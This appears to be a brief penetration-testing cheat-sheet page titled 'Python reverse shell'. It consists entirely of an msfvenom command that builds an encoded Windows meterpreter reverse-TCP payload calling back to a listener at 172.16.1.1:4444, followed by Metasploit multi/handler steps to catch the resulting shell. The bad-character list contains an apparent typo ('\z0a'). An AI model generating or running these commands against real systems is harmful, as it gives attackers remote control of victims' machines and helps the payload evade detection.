Python

#Python reverse shell

Msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=172.16.1.1 lport=4444 -e x86/shikata_ga_nai -b '\x00\z0a\x0d\x26' -f python --smallest

Msfconsole

Use exploit/multi/handler

Set lhost

Set lport

Set payload windows/meterpreter/reverse_tcp

Run

Last updated